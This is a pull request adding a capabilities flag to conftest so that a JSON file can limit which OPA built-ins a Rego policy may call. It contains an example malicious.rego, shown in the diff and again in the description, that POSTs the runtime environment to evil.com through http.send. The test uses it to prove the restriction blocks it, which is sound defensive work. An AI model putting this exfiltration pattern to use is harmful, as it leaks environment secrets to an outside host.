### PR TITLE
feat: add capabilities feature to conftest

### DIFF
--- a/acceptance.bats
+++ b/acceptance.bats
@@ -412,3 +412,10 @@
   run ./conftest test -p examples/dotenv/policy/ examples/dotenv/sample.env
   [ "$status" -eq 0 ]
 }
+
+@test "Should fail if an opa function is not defined given capabilities file" {
+  run ./conftest test examples/kubernetes/deployment.yaml -p examples/kubernetes/policy/ -p examples/capabilities/malicious.rego --capabilities examples/capabilities/capabilities.json
+  [ "$status" -eq 1 ]
+  [[ "$output" =~ "undefined function opa.runtime" ]]
+  [[ "$output" =~ "undefined function http.send" ]]
+}

--- a/examples/capabilities/capabilities.json
+++ b/examples/capabilities/capabilities.json
@@ -1,0 +1,68 @@
+{ "builtins" : [
+  {
+    "decl" : {
+        "args" : [ {
+              "of" : [
+                  {
+                    "of" : { "type" : "any" },
+                    "type" : "set"
+                  },
+                  {
+                    "dynamic" : { "type" : "any" },
+                    "type" : "array"
+                  },
+                  {
+                    "dynamic" : {
+                        "key" : { "type" : "any" },
+                        "value" : { "type" : "any" }
+                      },
+                    "type" : "object"
+                  },
+                  { "type" : "string" }
+                ],
+              "type" : "any"
+            } ],
+        "result" : { "type" : "number" },
+        "type" : "function"
+      },
+    "name" : "count"
+  },
+  {
+    "decl" : {
+        "args" : [
+            { "type" : "any" },
+            { "type" : "any" }
+          ],
+        "result" : { "type" : "boolean" },
+        "type" : "function"
+      },
+    "infix" : "=",
+    "name" : "eq"
+  },
+  {
+    "decl" : {
+        "args" : [
+            { "type" : "string" },
+            {
+              "dynamic" : { "type" : "any" },
+              "type" : "array"
+            }
+          ],
+        "result" : { "type" : "string" },
+        "type" : "function"
+      },
+    "name" : "sprintf"
+  },
+  {
+    "decl" : {
+        "args" : [
+            { "type" : "any" },
+            { "type" : "any" }
+          ],
+        "result" : { "type" : "boolean" },
+        "type" : "function"
+      },
+    "infix" : "==",
+    "name" : "equal"
+  }
+]}

--- a/examples/capabilities/malicious.rego
+++ b/examples/capabilities/malicious.rego
@@ -1,0 +1,10 @@
+package main
+
+attack {
+    request := {
+        "url": "https://evil.com:9999",
+        "method": "POST",
+        "body": opa.runtime().env,
+    }
+    response := http.send(request)
+}

--- a/internal/commands/push.go
+++ b/internal/commands/push.go
@@ -133,7 +133,7 @@ func pushBundle(ctx context.Context, repository string, path string) (*ocispec.D
 }
 
 func buildLayers(ctx context.Context, memoryStore *content.Memorystore, path string) ([]ocispec.Descriptor, error) {
-	engine, err := policy.LoadWithData(ctx, []string{path}, []string{path})
+	engine, err := policy.LoadWithData(ctx, []string{path}, []string{path}, "")
 	if err != nil {
 		return nil, fmt.Errorf("load: %w", err)
 	}

--- a/internal/commands/test.go
+++ b/internal/commands/test.go
@@ -96,6 +96,7 @@ func NewTestCommand(ctx context.Context) *cobra.Command {
 				"output",
 				"parser",
 				"policy",
+				"capabilities",
 				"trace",
 				"update",
 				"junit-hide-message",
@@ -164,6 +165,7 @@ func NewTestCommand(ctx context.Context) *cobra.Command {
 
 	cmd.Flags().String("ignore", "", "A regex pattern which can be used for ignoring paths")
 	cmd.Flags().String("parser", "", fmt.Sprintf("Parser to use to parse the configurations. Valid parsers: %s", parser.Parsers()))
+	cmd.Flags().String("capabilities", "", "Path to JSON file that can restrict opa functionality against a given policy. Default: all operations allowed")
 
 	cmd.Flags().StringP("output", "o", output.OutputStandard, fmt.Sprintf("Output format for conftest results - valid options are: %s", output.Outputs()))
 	cmd.Flags().Bool("junit-hide-message", false, "Do not include the violation message in the JUnit test name")

--- a/internal/commands/verify.go
+++ b/internal/commands/verify.go
@@ -68,7 +68,7 @@ func NewVerifyCommand(ctx context.Context) *cobra.Command {
 		Short: "Verify Rego unit tests",
 		Long:  verifyDesc,
 		PreRunE: func(cmd *cobra.Command, args []string) error {
-			flagNames := []string{"data", "no-color", "output", "policy", "trace", "report", "quiet", "junit-hide-message"}
+			flagNames := []string{"data", "no-color", "output", "policy", "trace", "report", "quiet", "junit-hide-message", "capabilities"}
 			for _, name := range flagNames {
 				if err := viper.BindPFlag(name, cmd.Flags().Lookup(name)); err != nil {
 					return fmt.Errorf("bind flag: %w", err)
@@ -128,6 +128,7 @@ func NewVerifyCommand(ctx context.Context) *cobra.Command {
 	cmd.Flags().StringP("output", "o", output.OutputStandard, fmt.Sprintf("Output format for conftest results - valid options are: %s", output.Outputs()))
 	cmd.Flags().Bool("junit-hide-message", false, "Do not include the violation message in the JUnit test name")
 
+	cmd.Flags().String("capabilities", "", "Path to JSON file that can restrict opa functionality against a given policy. Default: all operations allowed")
 	cmd.Flags().StringSliceP("data", "d", []string{}, "A list of paths from which data for the rego policies will be recursively loaded")
 	cmd.Flags().StringSliceP("policy", "p", []string{"policy"}, "Path to the Rego policy files directory")
 

--- a/policy/engine_test.go
+++ b/policy/engine_test.go
@@ -12,7 +12,7 @@ func TestException(t *testing.T) {
 	ctx := context.Background()
 
 	policies := []string{"../examples/exceptions/policy"}
-	engine, err := Load(ctx, policies)
+	engine, err := Load(ctx, policies, ast.CapabilitiesForThisVersion())
 	if err != nil {
 		t.Fatalf("loading policies: %v", err)
 	}
@@ -52,7 +52,7 @@ func TestTracing(t *testing.T) {
 		ctx := context.Background()
 
 		policies := []string{"../examples/kubernetes/policy"}
-		engine, err := Load(ctx, policies)
+		engine, err := Load(ctx, policies, ast.CapabilitiesForThisVersion())
 		if err != nil {
 			t.Fatalf("loading policies: %v", err)
 		}
@@ -81,7 +81,7 @@ func TestTracing(t *testing.T) {
 		ctx := context.Background()
 
 		policies := []string{"../examples/kubernetes/policy"}
-		engine, err := Load(ctx, policies)
+		engine, err := Load(ctx, policies, ast.CapabilitiesForThisVersion())
 		if err != nil {
 			t.Fatalf("loading policies: %v", err)
 		}
@@ -110,7 +110,7 @@ func TestMultifileYaml(t *testing.T) {
 	ctx := context.Background()
 
 	policies := []string{"../examples/kubernetes/policy"}
-	engine, err := Load(ctx, policies)
+	engine, err := Load(ctx, policies, ast.CapabilitiesForThisVersion())
 	if err != nil {
 		t.Fatalf("loading policies: %v", err)
 	}
@@ -156,7 +156,7 @@ func TestDockerfile(t *testing.T) {
 	ctx := context.Background()
 
 	policies := []string{"../examples/docker/policy"}
-	engine, err := Load(ctx, policies)
+	engine, err := Load(ctx, policies, ast.CapabilitiesForThisVersion())
 	if err != nil {
 		t.Fatalf("loading policies: %v", err)
 	}

--- a/runner/test.go
+++ b/runner/test.go
@@ -18,6 +18,7 @@ import (
 // Rego policy checks against configuration files.
 type TestRunner struct {
 	Trace              bool
+	Capabilities       string
 	Policy             []string
 	Data               []string
 	Update             []string
@@ -59,7 +60,7 @@ func (t *TestRunner) Run(ctx context.Context, fileList []string) ([]output.Check
 		}
 	}
 
-	engine, err := policy.LoadWithData(ctx, t.Policy, t.Data)
+	engine, err := policy.LoadWithData(ctx, t.Policy, t.Data, t.Capabilities)
 	if err != nil {
 		return nil, fmt.Errorf("load: %w", err)
 	}

--- a/runner/verify.go
+++ b/runner/verify.go
@@ -15,13 +15,14 @@ import (
 // VerifyRunner is the runner for the Verify command, executing
 // Rego policy unit-tests.
 type VerifyRunner struct {
-	Policy  []string
-	Data    []string
-	Output  string
-	NoColor bool `mapstructure:"no-color"`
-	Trace   bool
-	Report  string
-	Quiet   bool
+	Capabilities string
+	Policy       []string
+	Data         []string
+	Output       string
+	NoColor      bool `mapstructure:"no-color"`
+	Trace        bool
+	Report       string
+	Quiet        bool
 }
 
 const (
@@ -32,7 +33,7 @@ const (
 
 // Run executes the Rego tests for the given policies.
 func (r *VerifyRunner) Run(ctx context.Context) ([]output.CheckResult, []*tester.Result, error) {
-	engine, err := policy.LoadWithData(ctx, r.Policy, r.Data)
+	engine, err := policy.LoadWithData(ctx, r.Policy, r.Data, r.Capabilities)
 	if err != nil {
 		return nil, nil, fmt.Errorf("load: %w", err)
 	}


### PR DESCRIPTION
Fix: https://github.com/open-policy-agent/conftest/issues/690

**Example Executions:**

Assume that you have examples/policy2/malicious.rego:

```rego
package main

deny {
    request := {
        "url": "https://evil.com:9999",
        "method": "POST",
        "body": opa.runtime().env,
    }
    response := http.send(request)
}
```

_by default behavior:_

```shell
./conftest test examples/kubernetes/deployment.yaml -p examples/kubernetes/policy2/

1 test, 1 passed, 0 warnings, 0 failures, 0 exceptions
```

_with a capabilities file that has everything defined inside:_

```shell
./conftest test examples/kubernetes/deployment.yaml -p examples/kubernetes/policy2/ --capabilities v0.17.0.json

1 test, 1 passed, 0 warnings, 0 failures, 0 exceptions
```


_having capabilities file which excludes sending HTTP requests:_

```shell
./conftest test examples/kubernetes/deployment.yaml -p examples/kubernetes/policy2/ --capabilities v0.17.0.json
Error: running test: load: loading policies: get compiler: 1 error occurred: examples/kubernetes/policy2/malicious.rego:9: rego_type_error: undefined function http.send
```